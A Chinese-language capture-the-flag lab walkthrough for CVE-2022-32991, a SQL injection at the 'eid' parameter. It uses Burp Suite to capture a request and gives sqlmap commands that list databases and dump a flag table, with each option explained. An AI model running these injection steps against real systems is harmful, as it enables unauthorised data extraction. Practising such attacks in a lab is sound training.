启动靶场CVE-2022-32991:
打开靶场:
选择LOGIN进入系统登录页面。
没有账号~选择注册新账号。
随便注册一个账号,不要忘记了,一会儿登录需要使用。
使用刚刚注册的账号密码登录访问系统。
访问系统第一行功能点。
发现数据库注入点~接下来使用BP和sqlmap联合作战。
打开BP抓包,刷新该页面,抓取数据包。(eid为sqlmap注入点)
新建一个名为1.txt的文本文档在sqlmap文件夹内,在注入点eid字段末尾添加*,设置为注入点。
使用python运行sqlmap.py脚本,利用脚本注入刚刚保存的数据包文档
命令:python sqlmap.py -r 1.txt --batch --dbs
-r 1.txt (使用sqlmap注入名为1.txt的文本文件)
--batch (所有sqlmap中的选项全选Y【是】)
--dbs (检查注入点中的所有数据库表)
承接上表继续使用sqlmap命令查看ctf表内信息。
命令:python sqlmap.py -r 1.txt --batch -D ctf --tables
-r 1.txt (使用sqlmap注入名为1.txt的文本文件)
--batch (所有sqlmap中的选项全选Y【是】)
-D ctf --tables (访问表名为ctf的表单全量数据)
承接上表继续使用sqlmap命令查看ctf表内flag字段信息。
命令:python sqlmap.py -r 1.txt --batch -D ctf -T flag --dump
-r 1.txt (使用sqlmap注入名为1.txt的文本文件)
--batch (所有sqlmap中的选项全选Y【是】)
-D ctf --tables (访问表名为ctf的表单全量数据)
-T flag --dump (查看flag字段的详细信息)
获取到flag,将其返回到云镜提交。
关闭靶场,活动结束~一起加油!!!